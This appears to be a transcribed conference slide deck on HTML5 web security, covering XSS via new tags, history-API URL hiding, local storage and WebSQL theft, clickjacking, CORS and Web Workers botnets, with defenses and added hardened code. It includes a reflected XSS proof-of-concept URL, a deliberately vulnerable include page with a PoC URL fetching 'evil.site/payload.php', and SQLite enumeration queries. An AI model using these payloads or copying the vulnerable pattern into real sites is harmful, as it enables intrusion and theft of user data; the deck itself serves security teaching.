talk about html5 security
![Page 1: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/1.jpg)
youstar@insight-labs
![Page 2: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/2.jpg)
Agenda:
- Introduction to HTML5
- HTML5 threat model
- Vulnerabilities & Defense
- Tools
- Reference
![Page 3: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/3.jpg)
History
- HTML 1.0: 1993.6, not a standard
- HTML 2.0: 1995.11, RFC 1866
- HTML 3.2: 1996.1.14, W3C Recommended Standard
- HTML 4.0: 1997.12.18, W3C Recommended Standard
- HTML 4.01: 1999.12.24, W3C Recommended Standard
- XHTML: 2000.1.20, W3C Recommended Standard
- HTML5: 2008 first draft standard; 2012 W3C Candidate Recommendation
![Page 4: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/4.jpg)
Features
The three aspects of HTML5:
- Content: HTML, with new tags and attributes
- Presentation of content: CSS
- Interaction with content: JavaScript, with new APIs (Drag, LocalStorage, WebWorkers, etc.)
![Page 5: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/5.jpg)
Features
![Page 6: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/6.jpg)
![Page 7: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/7.jpg)
![Page 8: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/8.jpg)
- XSS abuse with tags and attributes
- Hiding URL code
- Stealing from the storage
- Injecting and exploiting WebSQL
- ClickJacking and CookieJacking
- Cross Origin Request and postMessage
- Client-side file includes
- Botnet and widgets
![Page 9: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/9.jpg)
In:
- New tags: `<button>`, `<video>`, `<audio>`, `<article>`, `<footer>`, `<nav>`
- New attributes for tags: autocomplete, autofocus, pattern (yes, regex) for input
- New media events
- New `<canvas>` tag for 2D rendering
- New form controls for date and time
- Geolocation
- New selectors
- Client-side storage including localStorage, sessionStorage, and WebSQL

Out:
- Presentation elements such as `<font>`, `<center>`
- Presentation attributes including align, border
- `<frame>`, `<frameset>`
- `<applet>`
- Old special effects: `<marquee>`, `<bgsound>`
- `<noscript>`
![Page 10: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/10.jpg)
Attack:
- New XSS vector
- Bypass black-list filter

Defense:
- Add the new tags to the black-list
- Change the regex
![Page 11: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/11.jpg)
![Page 12: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/12.jpg)
DOM history API:
```javascript
window.history.back();
window.history.forward();
window.history.go();
```
HTML5 additions:
```javascript
history.pushState(stateObject, title, URL);
history.replaceState(stateObject, title, URL); // same as pushState, but modifies the current history entry
```
![Page 13: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/13.jpg)
PoC: the injected script rewrites the visible URL, so the payload no longer appears in the address bar:
```
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState(null,'',location.href.split("?").shift());document.write(1)</script>
```
After pushState the address bar shows only:
```
http://127.0.0.1/html5/poc/history/xsspoc.php
```
![Page 14: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/14.jpg)
![Page 15: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/15.jpg)
Type
- LocalStorage: for long-term storage
- SessionStorage: for the session of the application (lasts until the browser is closed)

Differences
- Cookies: 4k
- LocalStorage / SessionStorage: depends on the browser (usually 5MB)

Support
- Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
![Page 16: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/16.jpg)
![Page 17: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/17.jpg)
Functions
```javascript
(localStorage | sessionStorage).setItem(key, value); // store one key
(localStorage | sessionStorage).getItem(key);        // read one key
(localStorage | sessionStorage).removeItem(key);     // remove one key
(localStorage | sessionStorage).clear();             // remove everything for this origin
```
![Page 18: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/18.jpg)
Attack
- Get the data from the storage (cookie, password, etc.)
- Store your XSS payload in the storage
- No path restriction: storage is scoped by origin only, unlike cookies

Defense
- Don't store sensitive data in local storage
- Don't use local storage for session identifiers
- Stick with cookies and use the HttpOnly and Secure flags
![Page 19: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/19.jpg)
![Page 20: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/20.jpg)
Database Storage
The same as Google Gears
Operate:
```javascript
var db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSize);
db.transaction(function (tx) {
  // executeSql runs inside a transaction callback
  tx.executeSql("YOUR SQL STATEMENT HERE", [], successCallback, errorCallback);
});
```
Type
- SQLite (supported by WebKit)
![Page 21: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/21.jpg)
Attack
- Store shellcode
- SQL injection

Defense
- Be strict with SQL operations (use parameterized statements)
- Encode the SQL result before display
- Don't store sensitive data
![Page 22: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/22.jpg)
Store shellcode
![Page 23: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/23.jpg)
SQL Injection
Use sqlite_master:
```sql
SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()
```
Select with ?:
```javascript
executeSql("SELECT name FROM stud WHERE id=" + input_id);   // False: string concatenation, injectable
executeSql("SELECT name FROM stud WHERE id=?", [input_id]); // True: parameterized, safe
```
![Page 24: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/24.jpg)
Drag and drop basics
- Drag data
- The drag feedback image
- Drag effects
- Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend
![Page 25: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/25.jpg)
![Page 26: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/26.jpg)
ClickJacking
XSS + Drag
![Page 27: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/27.jpg)
![Page 28: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/28.jpg)
CookieJacking
Combines several techniques to steal the user's local cookies
Technology
- How to read the local file: iframe + file://
- How to detect the state of cookies: Clickjacking
- How to send cookies: SMB
![Page 29: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/29.jpg)
![Page 30: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/30.jpg)
Defense
- Use iframe with sandbox
- Frame busting:
```javascript
if (top !== window) top.location = window.location.href;
// equivalent form
if (top != self) top.location.href = self.location.href;
```
![Page 31: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/31.jpg)
postMessage
Send:
```javascript
otherWindow.postMessage(message, targetOrigin);
```
Receive:
```javascript
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event) {
  if (event.origin !== "http://example.org:8080")
    return;
  // ...
}
```
![Page 32: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/32.jpg)
![Page 33: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/33.jpg)
Defense
- Check the postMessage origin
- Don't use innerHTML:
```javascript
element.innerHTML = e.data;   // danger
element.textContent = e.data; // safe
```
- Don't use eval to deal with the message
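Added example (not from the slides): a receiver that applies all three defenses above at once, origin check, JSON instead of eval, and textContent instead of innerHTML. It is written as plain functions with constructed sample events so it runs outside a browser; the allowed origin and the `{type, text}` message shape are assumptions for the example.

```javascript
// Only messages from this origin are accepted (assumed value for the example).
const ALLOWED_ORIGIN = "http://example.org:8080";

// Parse the message body with JSON.parse (never eval) and accept only a known shape.
function parseMessage(data) {
  let obj;
  try {
    obj = JSON.parse(data);
  } catch (e) {
    return null;                                   // not JSON: drop it
  }
  if (obj === null || typeof obj !== "object") return null;
  if (obj.type !== "greeting" || typeof obj.text !== "string") return null;
  return { type: obj.type, text: obj.text };       // copy only the fields we expect
}

// Returns the text to display, or null when the message must be ignored.
function handleMessage(event, allowedOrigin = ALLOWED_ORIGIN) {
  if (event.origin !== allowedOrigin) return null; // wrong origin: drop before parsing
  const msg = parseMessage(event.data);
  return msg === null ? null : msg.text;
}

// Render with textContent: any markup in the message is shown literally, not parsed.
function render(element, event) {
  const text = handleMessage(event);
  element.textContent = text === null ? "" : text;
  return element.textContent;
}

// Constructed sample events and a stand-in element (no DOM needed).
const sampleElement = { textContent: "" };
const fromTrustedOrigin = {
  origin: ALLOWED_ORIGIN,
  data: JSON.stringify({ type: "greeting", text: "hi <b>there</b>" }),
};
const fromOtherOrigin = { origin: "http://other.example", data: fromTrustedOrigin.data };
const notJson = { origin: ALLOWED_ORIGIN, data: "alert(1)" };

// In a page this would be wired as:
// window.addEventListener("message", e => render(document.getElementById("main"), e), false);
```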
![Page 34: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/34.jpg)
Cross-Origin Resource Sharing
Originally Ajax calls were subject to the Same Origin Policy: Site A cannot make XMLHttpRequests to Site B. HTML5 makes it possible to make these cross-domain calls.
Site A -> Site B (the response must include a header):
```
Access-Control-Allow-Origin: Site A        (must)
Access-Control-Allow-Credentials: true | false
Access-Control-Expose-Headers:
etc.
```
![Page 35: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/35.jpg)
![Page 36: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/36.jpg)
![Page 37: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/37.jpg)
Defense
- Don't set this: `Access-Control-Allow-Origin: *` (compare Flash's crossdomain.xml)
- Prevent DDoS
- Check the request origin before allowing it:
```
if (origin == "Site A") header("Access-Control-Allow-Origin: Site A"); // ... then process the request
```
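Added example (not from the slides): the server-side allow-list check sketched above as a plain function, so it can run anywhere. The allow-list entry standing in for "Site A" and the returned header shape are assumptions for the example.

```javascript
// Origins trusted to read responses cross-origin (constructed value for the example).
const ALLOWED_ORIGINS = new Set(["https://site-a.example"]);

// Returns the CORS headers to add to the response, or {} when the request
// origin is not trusted (the browser then blocks the cross-origin read).
// Origins are compared as whole strings: scheme, host and port must all match,
// so a look-alike host such as "https://site-a.example.other.test" does not pass.
function corsHeaders(requestOrigin, allowCredentials = false) {
  if (typeof requestOrigin !== "string") return {};
  let normalized;
  try {
    normalized = new URL(requestOrigin).origin;  // canonical form, e.g. drops a trailing "/"
  } catch (e) {
    return {};                                    // malformed or "null" Origin (sandboxed frame)
  }
  if (!ALLOWED_ORIGINS.has(normalized)) return {};
  const headers = {
    // Echo the one matching origin, never "*": with credentials browsers reject "*",
    // and without credentials "*" still opens the response to every site.
    "Access-Control-Allow-Origin": normalized,
    // Tell caches the response depends on Origin, so one site's allow header
    // is not served from cache to another.
    "Vary": "Origin",
  };
  if (allowCredentials) headers["Access-Control-Allow-Credentials"] = "true";
  return headers;
}
```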
![Page 38: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/38.jpg)
Code like this (vulnerable by design; the fragment is fetched without any check):
```html
<html><body><script>
x = new XMLHttpRequest();
x.open("GET", location.hash.substring(1));
x.onreadystatechange = function () {
  if (x.readyState == 4)
    document.getElementById("main").innerHTML = x.responseText;
};
x.send();
</script>
<div id="main"></div>
</body></html>
```
POC
Introducing cross-origin requests: http://example.com/#http://evil.site/payload.php
Contents of 'payload.php' will be included as HTML within `<div id="main"></div>`
New type of XSS!!
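Added example (not from the slides): the hardened counterpart of the code above. Instead of passing location.hash straight to XMLHttpRequest, the fragment is resolved against the page origin and accepted only when it names a same-origin path on a fixed allow-list; the response is then inserted with textContent rather than innerHTML. The page origin, the allowed paths and the xhrFactory hook are assumptions for the example.

```javascript
// Origin of the including page and the paths it may include (constructed values).
const PAGE_ORIGIN = "http://example.com";
const ALLOWED_PATHS = new Set(["/pages/home.html", "/pages/about.html"]);

// Returns the absolute URL that may be fetched, or null if the fragment must be
// rejected. Covers the empty hash, absolute cross-origin URLs, protocol-relative
// URLs ("//host/x") and ".." traversal (normalized by URL before the check).
function resolveInclude(hash, pageOrigin = PAGE_ORIGIN) {
  const fragment = (hash || "").replace(/^#/, "");
  if (fragment === "") return null;
  let target;
  try {
    target = new URL(fragment, pageOrigin + "/");  // relative paths resolve to the page origin
  } catch (e) {
    return null;
  }
  if (target.origin !== pageOrigin) return null;    // "#http://other.site/x" stops here
  if (!ALLOWED_PATHS.has(target.pathname)) return null;
  return target.href;
}

// Fetch-and-render step, separated from the decision so the logic runs without a
// browser; xhrFactory is a hook (assumed) that returns an XMLHttpRequest-like object.
// The response goes in via textContent, so even a same-origin file is shown as text.
function loadInclude(element, hash, xhrFactory) {
  const url = resolveInclude(hash);
  if (url === null) { element.textContent = ""; return null; }
  const x = xhrFactory();
  x.open("GET", url);
  x.onreadystatechange = function () {
    if (x.readyState === 4) element.textContent = x.responseText;
  };
  x.send();
  return url;
}
// In a page: loadInclude(document.getElementById("main"), location.hash, () => new XMLHttpRequest());
```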
![Page 39: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/39.jpg)
![Page 40: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/40.jpg)
Web Workers
Running scripts in the background independently
Very simple:
```javascript
var w = new Worker("some_script.js");
w.onmessage = function (e) { /* do something */ };
w.terminate();
```
Can access: XHR, the navigator object, the application cache, and can spawn other workers!
Can't access: DOM, window, document objects
![Page 41: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/41.jpg)
Attack
- Botnet
  - Application-level DDoS attacks
  - Email spam
  - Distributed password cracking
  - Network scanning
- Guessing the user's private IP address
  - Identify the user's subnet
  - Identify the IP address
![Page 42: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/42.jpg)
COR + XSS + Workers = Shell of the Future
![Page 43: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/43.jpg)
HTML5CSdump
Uses the enumeration and extraction techniques described before to obtain all the client-side storage belonging to a certain domain name
JS-Recon
- Port scans
- Network scans
- Detecting the private IP address
![Page 44: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/44.jpg)
Imposter
- Steal cookies
- Set cookies
- Steal Local Shared Objects
- Steal stored passwords from Firefox
- etc.

Shell of the Future
- Reverse web shell handler
- Bypass anti-session hijacking measures
![Page 45: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/45.jpg)
Ravan
JavaScript based distributed computing system
Hashing algorithms: MD5, SHA1, SHA256, SHA512
![Page 46: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/46.jpg)
- HTML5 带来的新安全威胁 (New security threats brought by HTML5): xisigr
- Attacking with HTML5: lavakumark
- Abusing HTML5: Ming Chow
- HTML5 Web Security: Thomas Röthlisberger
- Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
- Cookiejacking: Rosario Valotta
- http://heideri.ch/jso/#html5
- http://www.wooyun.org/bugs/wooyun-2011-02351
- http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
- http://www.html5test.com
![Page 47: Talk about html5 security](https://reader033.vdocuments.site/reader033/viewer/2022052911/559e031e1a28ab156a8b4741/html5/thumbnails/47.jpg)
- http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
- http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
- http://code.google.com/intl/zh-CN/apis/gears/api_database.html
- http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
- http://www.w3.org/TR/access-control/
- http://m-austin.com/blog/?p=19
- https://developer.mozilla.org/en/
- http://www.w3.org/TR/cors/
- http://www.andlabs.org/tools/ravan.html
- http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/